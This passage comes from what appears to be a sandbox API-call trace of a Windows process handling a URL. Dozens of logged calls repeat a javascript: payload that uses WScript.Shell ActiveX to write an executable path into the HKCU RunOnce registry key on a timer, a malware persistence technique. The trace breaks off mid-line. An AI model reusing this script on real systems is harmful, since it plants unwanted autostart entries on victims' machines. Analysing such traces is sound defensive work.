Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x33f6e0 | out: ppvObject=0x33f6e0*=0x78af4c) returned 0x0 [0066.589] IUriContainer:GetIUri (in: This=0x78af4c, ppIUri=0x33f710 | out: ppIUri=0x33f710*=0x78ca14) returned 0x0 [0066.589] IUnknown:Release (This=0x78af4c) returned 0x1 [0066.589] IUnknown:AddRef (This=0x78af40) returned 0x2 [0066.589] IUnknown:AddRef (This=0x78ca14) returned 0x5 [0066.590] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.590] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.590] IMoniker:GetDisplayName (in: This=0x78af40, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x33f5e8 | out: ppszDisplayName=0x33f5e8*="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);") returned 0x0 [0066.590] UrlGetLocationW (psz1="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);") returned 0x0 [0066.590] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ppmk=0x33f5b4*=0x0, dwFlags=0x1 | out: ppmk=0x33f5b4*=0x7a08d0) returned 0x0 [0066.591] DllGetClassObject (in: rclsid=0x79224c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f0f8 | out: ppv=0x33f0f8*=0x75028d20) returned 0x0 [0066.591] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33f1e4 | out: ppvObject=0x33f1e4*=0x75028d2c) returned 0x0 [0066.591] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.591] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ParseAction=1, dwParseFlags=0x10000, pwzResult=0x7a1fa0, cchResult=0x824, pcchResult=0x33f4f8, dwReserved=0x0 | out: pwzResult="", pcchResult=0x33f4f8*=0x0) returned 0x800c0011 [0066.591] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.592] CreateUri (in: pwzURI="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x33f5ac | out: ppURI=0x33f5ac*=0x78c78c) returned 0x0 [0066.592] IUri:GetScheme (in: This=0x78c78c, pdwScheme=0x33f544 | out: pdwScheme=0x33f544*=0xf) returned 0x0 [0066.592] CoInternetIsFeatureEnabled (FeatureEntry=0x1, dwFlags=0x2) returned 0x1 [0066.592] IUnknown:QueryInterface (in: This=0x78c78c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f54c | out: ppvObject=0x33f54c*=0x78c78c) returned 0x0 [0066.593] IUnknown:Release (This=0x78c78c) returned 0x2 [0066.593] IUnknown:AddRef (This=0x78c78c) returned 0x3 [0066.593] IUnknown:Release (This=0x78c78c) returned 0x2 [0066.593] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.593] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x1c) returned 0x790978 [0066.593] IUnknown:AddRef (This=0x78c78c) returned 0x3 [0066.593] IUri:GetAbsoluteUri (in: This=0x78c78c, pbstrAbsoluteUri=0x790978 | out: pbstrAbsoluteUri=0x790978*="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);") returned 0x0 [0066.593] IUnknown:Release (This=0x78c78c) returned 0x2 [0066.593] IUnknown:AddRef (This=0x7a08d0) returned 0x2 [0066.593] IUnknown:Release (This=0x7a08d0) returned 0x1 [0066.593] IUnknown:AddRef (This=0x78af40) returned 0x3 [0066.593] IUnknown:Release (This=0x7a08d0) returned 0x0 [0066.593] IUnknown:AddRef (This=0x78af40) returned 0x4 [0066.593] IUnknown:QueryInterface (in: This=0x78ca14, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f3b4 | out: ppvObject=0x33f3b4*=0x78ca14) returned 0x0 [0066.593] IUnknown:Release (This=0x78ca14) returned 0x5 [0066.593] IUnknown:AddRef (This=0x78ca14) returned 0x6 [0066.593] IUnknown:QueryInterface (in: This=0x78af40, riid=0x74c272f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x33f388 | out: ppvObject=0x33f388*=0x78af4c) returned 0x0 [0066.593] IUriContainer:GetIUri (in: This=0x78af4c, ppIUri=0x33f3dc | out: ppIUri=0x33f3dc*=0x78ca14) returned 0x0 [0066.593] IUnknown:Release (This=0x78af4c) returned 0x4 [0066.593] IUnknown:AddRef (This=0x78af40) returned 0x5 [0066.593] IUnknown:Release (This=0x78af40) returned 0x4 [0066.594] IUnknown:AddRef (This=0x78ca14) returned 0x8 [0066.594] IUnknown:QueryInterface (in: This=0x78ca14, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f3b4 | out: ppvObject=0x33f3b4*=0x78ca14) returned 0x0 [0066.594] IUnknown:Release (This=0x78ca14) returned 0x8 [0066.594] IUnknown:AddRef (This=0x78ca14) returned 0x9 [0066.594] IUri:GetScheme (in: This=0x78ca14, pdwScheme=0x33f3ac | out: pdwScheme=0x33f3ac*=0xf) returned 0x0 [0066.594] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xc8) returned 0x7a4218 [0066.594] GetCurrentProcessId () returned 0x7bc [0066.594] IUnknown:QueryInterface (in: This=0x78ca14, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f3b4 | out: ppvObject=0x33f3b4*=0x78ca14) returned 0x0 [0066.594] IUnknown:Release (This=0x78ca14) returned 0x9 [0066.594] IUnknown:AddRef (This=0x78ca14) returned 0xa [0066.594] IUri:GetScheme (in: This=0x78ca14, pdwScheme=0x33f384 | out: pdwScheme=0x33f384*=0xf) returned 0x0 [0066.594] IUri:GetAbsoluteUri (in: This=0x78ca14, pbstrAbsoluteUri=0x33f3b4 | out: pbstrAbsoluteUri=0x33f3b4*="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);") returned 0x0 [0066.595] GetProcAddress (hModule=0x76e40000, lpProcName=0x7) returned 0x76e44680 [0066.595] SysStringLen (param_1="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);") returned 0xfd [0066.595] CreateUri (in: pwzURI="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x33f3d0 | out: ppURI=0x33f3d0*=0x78c78c) returned 0x0 [0066.595] IUnknown:Release (This=0x78ca14) returned 0x9 [0066.595] IUri:GetScheme (in: This=0x78c78c, pdwScheme=0x33f364 | out: pdwScheme=0x33f364*=0xf) returned 0x0 [0066.595] IUnknown:QueryInterface (in: This=0x78c78c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f36c | out: ppvObject=0x33f36c*=0x78c78c) returned 0x0 [0066.595] IUnknown:Release (This=0x78c78c) returned 0x3 [0066.595] IUnknown:AddRef (This=0x78c78c) returned 0x4 [0066.595] IUnknown:Release (This=0x78c78c) returned 0x3 [0066.595] IUnknown:AddRef (This=0x78c78c) returned 0x4 [0066.595] IUri:GetPropertyDWORD (in: This=0x78c78c, uriProp=0x11, pdwProperty=0x33f144, dwFlags=0x0 | out: pdwProperty=0x33f144*=0xf) returned 0x0 [0066.595] IInternetSecurityManager:GetSecurityId (in: This=0x796530, pwszUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", pbSecurityId=0x33f1a8, pcbSecurityId=0x33f1a4*=0x200, dwReserved=0x0 | out: pbSecurityId=0x33f1a8*=0x6a, pcbSecurityId=0x33f1a4*=0x101) returned 0x0 [0066.595] IInternetSecurityManager:GetSecurityId (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", pbSecurityId=0x33f1a8, pcbSecurityId=0x33f1a4*=0x200, dwReserved=0x0 | out: pbSecurityId=0x33f1a8*=0x0, pcbSecurityId=0x33f1a4*=0x200) returned 0x800c0011 [0066.596] DllGetClassObject (in: rclsid=0x79224c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33ea80 | out: ppv=0x33ea80*=0x75028d20) returned 0x0 [0066.596] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33eb6c | out: ppvObject=0x33eb6c*=0x75028d2c) returned 0x0 [0066.596] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.596] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ParseAction=3, dwParseFlags=0x0, pwzResult=0x7a4508, cchResult=0xfe, pcchResult=0x33ebb4, dwReserved=0x0 | out: pwzResult="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", pcchResult=0x33ebb4*=0xfe) returned 0x0 [0066.596] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x200) returned 0x7a4710 [0066.596] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a4710 | out: hHeap=0x760000) returned 1 [0066.596] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.597] DllGetClassObject (in: rclsid=0x79224c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33ea80 | out: ppv=0x33ea80*=0x75028d20) returned 0x0 [0066.597] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33eb6c | out: ppvObject=0x33eb6c*=0x75028d2c) returned 0x0 [0066.597] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.597] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ParseAction=17, dwParseFlags=0x0, pwzResult=0x7a4508, cchResult=0xfe, pcchResult=0x33ebc4, dwReserved=0x0 | out: pwzResult="", pcchResult=0x33ebc4*=0x0) returned 0x800c0011 [0066.597] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.597] IUnknown:Release (This=0x78c78c) returned 0x4 [0066.597] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x78bbb0 | out: hHeap=0x760000) returned 1 [0066.597] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x101) returned 0x7a83f8 [0066.598] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x78bc28 | out: hHeap=0x760000) returned 1 [0066.598] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x101) returned 0x7a8508 [0066.630] IUri:GetScheme (in: This=0x78ca14, pdwScheme=0x33f3ac | out: pdwScheme=0x33f3ac*=0xf) returned 0x0 [0066.657] GetDC (hWnd=0x0) returned 0x1b0101ce [0066.657] CreateCompatibleBitmap (hdc=0x1b0101ce, cx=1, cy=1) returned 0x505084a [0066.657] GetDIBits (in: hdc=0x1b0101ce, hbm=0x505084a, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x33ef30, usage=0x0 | out: lpvBits=0x0, lpbmi=0x33ef30) returned 1 [0066.657] GetDIBits (in: hdc=0x1b0101ce, hbm=0x505084a, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x33ef30, usage=0x0 | out: lpvBits=0x0, lpbmi=0x33ef30) returned 1 [0066.657] DeleteObject (ho=0x505084a) returned 1 [0066.657] GetSysColor (nIndex=0) returned 0xc8c8c8 [0066.657] GetSysColor (nIndex=1) returned 0x0 [0066.657] GetSysColor (nIndex=2) returned 0xd1b499 [0066.657] GetSysColor (nIndex=3) returned 0xdbcdbf [0066.658] GetSysColor (nIndex=4) returned 0xf0f0f0 [0066.658] GetSysColor (nIndex=5) returned 0xffffff [0066.658] GetSysColor (nIndex=6) returned 0x646464 [0066.658] GetSysColor (nIndex=7) returned 0x0 [0066.658] GetSysColor (nIndex=8) returned 0x0 [0066.658] GetSysColor (nIndex=9) returned 0x0 [0066.658] GetSysColor (nIndex=10) returned 0xb4b4b4 [0066.658] GetSysColor (nIndex=11) returned 0xfcf7f4 [0066.658] GetSysColor (nIndex=12) returned 0xababab [0066.658] GetSysColor (nIndex=13) returned 0xff9933 [0066.658] GetSysColor (nIndex=14) returned 0xffffff [0066.658] GetSysColor (nIndex=15) returned 0xf0f0f0 [0066.658] GetSysColor (nIndex=16) returned 0xa0a0a0 [0066.658] GetSysColor (nIndex=17) returned 0x6d6d6d [0066.658] GetSysColor (nIndex=18) returned 0x0 [0066.658] GetSysColor (nIndex=19) returned 0x544e43 [0066.658] GetSysColor (nIndex=20) returned 0xffffff [0066.658] GetSysColor (nIndex=21) returned 0x696969 [0066.658] GetSysColor (nIndex=22) returned 0xe3e3e3 [0066.658] GetSysColor (nIndex=23) returned 0x0 [0066.658] GetSysColor (nIndex=24) returned 0xe1ffff [0066.658] GetSysColor (nIndex=25) returned 0x0 [0066.658] GetSysColor (nIndex=26) returned 0xcc6600 [0066.658] GetSysColor (nIndex=27) returned 0xead1b9 [0066.658] GetSysColor (nIndex=28) returned 0xf2e4d7 [0066.658] GetSysColor (nIndex=29) returned 0xff9933 [0066.658] GetSysColor (nIndex=30) returned 0xf0f0f0 [0066.658] GetSysColor (nIndex=31) returned 0x0 [0066.658] GetSysColor (nIndex=32) returned 0x0 [0066.658] GetSysColor (nIndex=33) returned 0x0 [0066.658] GetSysColor (nIndex=34) returned 0x0 [0066.659] GetSysColor (nIndex=35) returned 0x0 [0066.659] GetSysColor (nIndex=36) returned 0x0 [0066.659] GetSysColor (nIndex=37) returned 0x0 [0066.659] GetSysColor (nIndex=38) returned 0x0 [0066.659] GetSysColor (nIndex=39) returned 0x0 [0066.659] GetSysColor (nIndex=40) returned 0x0 [0066.659] GetSysColor (nIndex=41) returned 0x0 [0066.659] GetSysColor (nIndex=42) returned 0x0 [0066.659] GetSysColor (nIndex=43) returned 0x0 [0066.659] GetSysColor (nIndex=44) returned 0x0 [0066.659] GetSysColor (nIndex=45) returned 0x0 [0066.659] GetSysColor (nIndex=46) returned 0x0 [0066.659] GetSysColor (nIndex=47) returned 0x0 [0066.659] GetSysColor (nIndex=48) returned 0x0 [0066.659] GetSysColor (nIndex=49) returned 0x0 [0066.659] GetSysColor (nIndex=50) returned 0x0 [0066.659] GetSysColor (nIndex=51) returned 0x0 [0066.659] GetSysColor (nIndex=52) returned 0x0 [0066.659] GetSysColor (nIndex=53) returned 0x0 [0066.659] GetSysColor (nIndex=54) returned 0x0 [0066.659] GetSysColor (nIndex=55) returned 0x0 [0066.659] GetSysColor (nIndex=56) returned 0x0 [0066.659] GetSysColor (nIndex=57) returned 0x0 [0066.659] GetSysColor (nIndex=58) returned 0x0 [0066.659] GetSysColor (nIndex=59) returned 0x0 [0066.659] GetSysColor (nIndex=60) returned 0x0 [0066.659] GetSysColor (nIndex=61) returned 0x0 [0066.659] GetSysColor (nIndex=62) returned 0x0 [0066.659] GetSysColor (nIndex=63) returned 0x0 [0066.659] GetDeviceCaps (hdc=0x1b0101ce, index=38) returned 32409 [0066.659] ReleaseDC (hWnd=0x0, hDC=0x1b0101ce) returned 1 [0066.660] GetCurrentThreadId () returned 0x544 [0066.660] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78bc28 [0066.660] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x50) returned 0x7a3230 [0066.661] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77d9d0 [0066.661] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x28) returned 0x77d3f8 [0066.661] GetProcAddress (hModule=0x76e40000, lpProcName=0x8) returned 0x76e43ed5 [0066.661] GetCurrentThreadId () returned 0x544 [0066.661] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77d9d0 | out: hHeap=0x760000) returned 1 [0066.661] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x200) returned 0x7a4508 [0066.661] ParseURLW (in: pcszURL="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ppu=0x33f350 | out: ppu=0x33f350) returned 0x0 [0066.662] CreateUri (in: pwzURI="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x33f334 | out: ppURI=0x33f334*=0x78c78c) returned 0x0 [0066.662] IUnknown:AddRef (This=0x78c78c) returned 0x6 [0066.662] IInternetSecurityManager:MapUrlToZone (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", pdwZone=0x33f2d4, dwFlags=0x0 | out: pdwZone=0x33f2d4*=0xffffffff) returned 0x800c0011 [0066.662] DllGetClassObject (in: rclsid=0x79224c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33eba8 | out: ppv=0x33eba8*=0x75028d20) returned 0x0 [0066.662] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33ec94 | out: ppvObject=0x33ec94*=0x75028d2c) returned 0x0 [0066.663] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.663] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ParseAction=3, dwParseFlags=0x0, pwzResult=0x7a4710, cchResult=0xfe, pcchResult=0x33ecdc, dwReserved=0x0 | out: pwzResult="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", pcchResult=0x33ecdc*=0xfe) returned 0x0 [0066.663] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x200) returned 0x7a4918 [0066.663] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a4918 | out: hHeap=0x760000) returned 1 [0066.663] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.663] DllGetClassObject (in: rclsid=0x79224c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33eba8 | out: ppv=0x33eba8*=0x75028d20) returned 0x0 [0066.663] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33ec94 | out: ppvObject=0x33ec94*=0x75028d2c) returned 0x0 [0066.664] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.664] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ParseAction=17, dwParseFlags=0x0, pwzResult=0x7a4710, cchResult=0xfe, pcchResult=0x33ecec, dwReserved=0x0 | out: pwzResult="", pcchResult=0x33ecec*=0x0) returned 0x800c0011 [0066.664] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.664] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0066.664] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0066.664] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0066.664] IInternetSecurityManager:ProcessUrlAction (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", dwAction=0x2700, pPolicy=0x33f2d8, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x33f2d8*=0x0) returned 0x0 [0066.664] IUnknown:Release (This=0x78c78c) returned 0x5 [0066.664] IUnknown:Release (This=0x78c78c) returned 0x4 [0066.665] IUnknown:AddRef (This=0x78c78c) returned 0x5 [0066.665] IUri:GetPropertyDWORD (in: This=0x78c78c, uriProp=0x11, pdwProperty=0x33f10c, dwFlags=0x0 | out: pdwProperty=0x33f10c*=0xf) returned 0x0 [0066.665] IInternetSecurityManager:GetSecurityId (in: This=0x796530, pwszUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", pbSecurityId=0x33f168, pcbSecurityId=0x33f164*=0x200, dwReserved=0x0 | out: pbSecurityId=0x33f168*=0x6a, pcbSecurityId=0x33f164*=0x101) returned 0x0 [0066.665] IInternetSecurityManager:GetSecurityId (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new 